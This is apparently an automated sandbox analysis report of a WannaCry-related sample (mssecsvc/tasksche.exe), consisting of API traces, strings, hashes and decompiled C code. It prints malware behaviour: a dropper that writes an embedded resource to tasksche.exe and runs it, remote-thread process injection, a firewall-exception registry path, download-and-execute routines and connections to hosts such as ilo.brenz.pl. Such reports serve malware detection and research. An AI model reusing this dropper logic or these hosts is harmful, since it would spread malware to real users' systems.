                                                                                                                                                  • Part of subcall function 00AC3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AC34A0
                                                                                                                                                  • Part of subcall function 00AC3405: UnmapViewOfFile.KERNEL32(?), ref: 00AC34B8
                                                                                                                                                Strings
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AC3F0C
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC3EDF, 00AC3EF4, 00AC3F0B, 00AC4195, 00AC41DB
                                                                                                                                                • C:,, xrefs: 00AC3EF6, 00AC3F08
                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 541178049-1428418298
                                                                                                                                                • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction ID: 44963c5d39a22d6718f2fd3c2ac2f3ca758a282ca8e57036e7ca9096d5059e97
                                                                                                                                                • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction Fuzzy Hash: 55A1EF72508248BFEB219F248C5EFEA7BACEF45300F06465CE84A8E082D6F45F45C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(7FEA3F54), ref: 7FEA3F60
                                                                                                                                                  • Part of subcall function 7FEA3F8F: LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                                                                                  • Part of subcall function 7FEA3F8F: WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                                                                                  • Part of subcall function 7FEA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                  • Part of subcall function 7FEA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                  • Part of subcall function 7FEA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                  • Part of subcall function 7FEA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                  • Part of subcall function 7FEA3F8F: connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                  • Part of subcall function 7FEA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA4195, 7FEA41DB
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 2996464229-1462811877
                                                                                                                                                • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                                                                                • Instruction ID: 9d7a0edf8395d02bdb3222331a00bfe847c5167623d17b4b3927ccf0a8489e01
                                                                                                                                                • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                                                                                • Instruction Fuzzy Hash: 5381FE71508388BFEB228F348C59BEA7BADEF41304F040659E84A9E091C7F66F45C762
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(00AC3F54), ref: 00AC3F60
                                                                                                                                                  • Part of subcall function 00AC3F8F: LoadLibraryA.KERNEL32(00AC3F83), ref: 00AC3F8F
                                                                                                                                                  • Part of subcall function 00AC3F8F: WSAStartup.WS2_32(00000101), ref: 00AC3FCE
                                                                                                                                                  • Part of subcall function 00AC3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
  • Part of subcall function 00AC3F8F: CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
  • Part of subcall function 00AC3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
  • Part of subcall function 00AC3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
  • Part of subcall function 00AC3F8F: connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
  • Part of subcall function 00AC3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AC4057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AC4066
• wsprintfA.USER32 ref: 00AC4179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AC41B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC41BD
• GetTickCount.KERNEL32 ref: 00AC41F6
Strings
• C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC4195, 00AC41DB
• C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
• String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE
• API String ID: 2996464229-1685824476
• Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
• Instruction ID: c58e74f80873d8b372d4a7d56a95447d20665ec7752c72425da5cf5d493acb91
• Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
• Instruction Fuzzy Hash: 9F81F171508258BFEB219F348C6ABEA7FACEF45310F05465CE88A8E182C6F45F45C765
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemTime.KERNEL32(7FEA7584), ref: 7FEA389F
• Sleep.KERNEL32(0000EA60), ref: 7FEA3911
• InternetGetConnectedState.WININET(?,00000000), ref: 7FEA392A
• gethostbyname.WS2_32(0D278125), ref: 7FEA396C
• socket.WS2_32(00000002,00000001,00000000), ref: 7FEA3981
• ioctlsocket.WS2_32(?,8004667E), ref: 7FEA399A
• connect.WS2_32(?,?,00000010), ref: 7FEA39B3
• Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FEA39C1
• closesocket.WS2_32 ref: 7FEA3A20
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
• String ID: eeauou.com
• API String ID: 159131500-1932208585
• Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction ID: 863d8d36320b09296de0ef8eaaf11b1bc77ac7fb125708de1e92797cd0aa2464
• Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction Fuzzy Hash: 4641C531604348BEDB218F208C49BE9BB6EEF85714F004159F90AEE1C1DBF79B409720
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 7FEA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
  • Part of subcall function 7FEA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
• CloseHandle.KERNEL32(?), ref: 7FEA05AD
• FreeLibrary.KERNEL32(745B0000,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07B8
• CloseHandle.KERNEL32(?,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07BF
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
• Process32First.KERNEL32 ref: 7FEA07DC
• Process32Next.KERNEL32 ref: 7FEA07ED
• OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
• CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
• CloseHandle.KERNEL32 ref: 7FEA086C
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
• String ID: csrs
• API String ID: 3908997113-2321902090
• Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
• Instruction ID: 84bb5cd5c05f80c9023c3546aa49ac891d3b4ee2c4a24ef2c536b510610674c9
• Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
• Instruction Fuzzy Hash: 59113D30502205BBEB255F31CD49BBF3A6DEF44711F00016CFE4B9E081DAB69B018AAA
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000104), ref: 7FEA278C
  • Part of subcall function 7FEA27A7: GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
  • Part of subcall function 7FEA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
  • Part of subcall function 7FEA27A7: InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
  • Part of subcall function 7FEA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
  • Part of subcall function 7FEA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
  • Part of subcall function 7FEA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
  • Part of subcall function 7FEA27A7: InternetCloseHandle.WININET(?), ref: 7FEA2833
• InternetCloseHandle.WININET(00000000), ref: 7FEA283A
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
• String ID:
• API String ID: 1995088466-0
• Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction ID: c1ca02f886126752e6f21441145c1cc666a01a53b77e18b91c733c89828b9d16
• Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction Fuzzy Hash: A821C0B1145306BFE7215A20CC8AFFF3A6DEF95B10F000119FA4AAD081D7B29B15C6A6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000104), ref: 00AC278C
  • Part of subcall function 00AC27A7: GetTempFileNameA.KERNEL32(?,00AC27A3,00000000,?), ref: 00AC27A8
  • Part of subcall function 00AC27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AC27A3,00000000,?), ref: 00AC27C3
  • Part of subcall function 00AC27A7: InternetReadFile.WININET(?,?,00000104), ref: 00AC27DD
  • Part of subcall function 00AC27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27F3
  • Part of subcall function 00AC27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27FF
  • Part of subcall function 00AC27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AC27A3), ref: 00AC2823
  • Part of subcall function 00AC27A7: InternetCloseHandle.WININET(?), ref: 00AC2833
• InternetCloseHandle.WININET(00000000), ref: 00AC283A
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
• String ID:
• API String ID: 1995088466-0
• Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction ID: f02e171e6f867a4f55d801f01784d921817fb8576e545cc77b9667b7c312b68a
• Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction Fuzzy Hash: 3921AFB1144206BFE7215B20CC8EFFF7A2DEF95B10F000529FA4999082D7B19E5587B6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
• InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
• CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
• InternetCloseHandle.WININET(?), ref: 7FEA2833
• InternetCloseHandle.WININET(00000000), ref: 7FEA283A
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
• String ID:
• API String ID: 3452404049-0
• Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
• Instruction ID: 5e72b063bb693ddb0cec3f1fad15b0eca3dde0b314aeb166be0943229ddb0145
• Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
• Instruction Fuzzy Hash: 56116DB1100606BBEB250B20CC4AFFB7A6DEF85B14F004519FA06AD080DBF5AB5196A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(01C8F87C), ref: 7FEA113D
• GetProcAddress.KERNEL32(00000000,7FEA11D6), ref: 7FEA1148
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: .DLL
• API String ID: 1646373207-899428287
• Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
• Instruction ID: 2f73ade5318114d7e9bf37e66f68aeb85e6b2a503a621854e5f62f64a3af89c8
• Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
• Instruction Fuzzy Hash: D701D634607104EACB538E38C845BFE3B7EFF14275F004115D91A8F159C77A9A508F95
Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(01C8F87C), ref: 00AC113D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC11D6), ref: 00AC1148
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: .DLL
                                                                                                                                                • API String ID: 1646373207-899428287
                                                                                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                                                                                • Instruction ID: 4f86a93ba56e1f864de5d1aa44c5c285daa7e04197ec747e8520e707f490b278
                                                                                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                                                                                • Instruction Fuzzy Hash: CF01C030707001EACF648F2CC849FAA3B7CEF06355F16421CEA1A8B257C778CE808696
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage: 71.8%
                                                                                                                                                Dynamic/Decrypted Code Coverage: 0%
                                                                                                                                                Signature Coverage: 0%
                                                                                                                                                Total number of Nodes: 37
                                                                                                                                                Total number of Limit Nodes: 9

                                                                                                                                                Callgraph

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00407CE0() {
                                                                                                                                                				void _v259;
                                                                                                                                                				char _v260;
                                                                                                                                                				void _v519;
                                                                                                                                                				char _v520;
                                                                                                                                                				struct _STARTUPINFOA _v588;
                                                                                                                                                				struct _PROCESS_INFORMATION _v604;
                                                                                                                                                				long _v608;
                                                                                                                                                				_Unknown_base(*)()* _t36;
                                                                                                                                                				void* _t38;
                                                                                                                                                				void* _t39;
                                                                                                                                                				void* _t50;
                                                                                                                                                				int _t59;
                                                                                                                                                				struct HINSTANCE__* _t104;
                                                                                                                                                				struct HRSRC__* _t105;
                                                                                                                                                				void* _t107;
                                                                                                                                                				void* _t108;
                                                                                                                                                				long _t109;
                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                				intOrPtr _t122;
                                                                                                                                                
                                                                                                                                                				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                				if(_t104 != 0) {
                                                                                                                                                					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                                                                                                                					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                                                                                                                					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                                                                                                                					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                                                                                                                					 *0x43144c = _t36;
                                                                                                                                                					if( *0x431478 != 0) {
                                                                                                                                                						_t121 =  *0x431458; // 0x7620f7b0
                                                                                                                                                						if(_t121 != 0) {
                                                                                                                                                							_t122 =  *0x431460; // 0x7620fc30
                                                                                                                                                							if(_t122 != 0 && _t36 != 0) {
                                                                                                                                                								_t105 = FindResourceA(0, 0x727, "R");
                                                                                                                                                								if(_t105 != 0) {
                                                                                                                                                									_t38 = LoadResource(0, _t105);
                                                                                                                                                									if(_t38 != 0) {
                                                                                                                                                										_t39 = LockResource(_t38);
                                                                                                                                                										_v608 = _t39;
                                                                                                                                                										if(_t39 != 0) {
                                                                                                                                                											_t109 = SizeofResource(0, _t105);
                                                                                                                                                											if(_t109 != 0) {
                                                                                                                                                												_v520 = 0;
                                                                                                                                                												memset( &_v519, 0, 0x40 << 2);
                                                                                                                                                												asm("stosw");
                                                                                                                                                												asm("stosb");
                                                                                                                                                												_v260 = 0;
                                                                                                                                                												memset( &_v259, 0, 0x40 << 2);
                                                                                                                                                												asm("stosw");
                                                                                                                                                												asm("stosb");
                                                                                                                                                												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                                                                                                                												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                                                                                                                												MoveFileExA( &_v520,  &_v260, 1); // executed
                                                                                                                                                												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
                                                                                                                                                												_t107 = _t50;
                                                                                                                                                												if(_t107 != 0xffffffff) {
                                                                                                                                                													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
                                                                                                                                                													FindCloseChangeNotification(_t107); // executed
                                                                                                                                                													_v604.hThread = 0;
                                                                                                                                                													_v604.dwProcessId = 0;
                                                                                                                                                													_v604.dwThreadId = 0;
                                                                                                                                                													memset( &(_v588.lpReserved), 0, 0x10 << 2);
                                                                                                                                                													asm("repne scasb");
                                                                                                                                                													_v604.hProcess = 0;
                                                                                                                                                													_t108 = " /i";
                                                                                                                                                													asm("repne scasb");
                                                                                                                                                													memcpy( &_v520 - 1, _t108, 0 << 2);
                                                                                                                                                													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                                                                                                                													_v588.cb = 0x44;
                                                                                                                                                													_v588.wShowWindow = 0;
                                                                                                                                                													_v588.dwFlags = 0x81;
                                                                                                                                                													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
                                                                                                                                                													if(_t59 != 0) {
                                                                                                                                                														CloseHandle(_v604.hThread);
                                                                                                                                                														CloseHandle(_v604);
                                                                                                                                                													}
                                                                                                                                                												}
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                			}

                                                                                                                                                Instruction addresses of the statements in the listing above (address column of the decompiled view, in listing order): 0x00407cf5 0x00407cfb 0x00407d15 0x00407d22 0x00407d2f 0x00407d34 0x00407d3c 0x00407d43 0x00407d49 0x00407d4f 0x00407d55 0x00407d5b 0x00407d7a 0x00407d7e 0x00407d86 0x00407d8e 0x00407d95 0x00407d9d 0x00407da1 0x00407daf 0x00407db3 0x00407dc4 0x00407dc8 0x00407dca 0x00407dcc 0x00407ddb 0x00407de2 0x00407def 0x00407df1 0x00407e01 0x00407e18 0x00407e2c 0x00407e43 0x00407e49 0x00407e4e 0x00407e61 0x00407e68 0x00407e72 0x00407e7a 0x00407e82 0x00407e8b 0x00407e95 0x00407e9b 0x00407e9f 0x00407ea8 0x00407eb0 0x00407ebc 0x00407ed3 0x00407edb 0x00407ee0 0x00407ee8 0x00407ef0 0x00407ef7 0x00407f02 0x00407f02 0x00407ef0 0x00407e4e 0x00407db3 0x00407da1 0x00407d8e 0x00407d7e 0x00407d5b 0x00407d4f 0x00407d43 0x00407f14

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F61FB10,?,00000000), ref: 00407CEF
• GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
• GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
• GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
• GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
• FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
• LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
• LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
• SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
• sprintf.MSVCRT ref: 00407E01
• sprintf.MSVCRT ref: 00407E18
• MoveFileExA.KERNEL32 ref: 00407E2C
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
• WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
• CreateProcessA.KERNELBASE ref: 00407EE8
• CloseHandle.KERNEL32(00000000), ref: 00407EF7
• CloseHandle.KERNEL32(08000000), ref: 00407F02
Strings
Memory Dump Source
• Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
• String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
• API String ID: 1541710770-1507730452
• Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
• Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
• Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
• Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 71%
_entry_(void* __ebx, void* __edi, void* __esi) {
	CHAR* _v8;
	intOrPtr* _v24;
	intOrPtr _v28;
	struct _STARTUPINFOA _v96;
	int _v100;
	char** _v104;
	int _v108;
	void _v112;
	char** _v116;
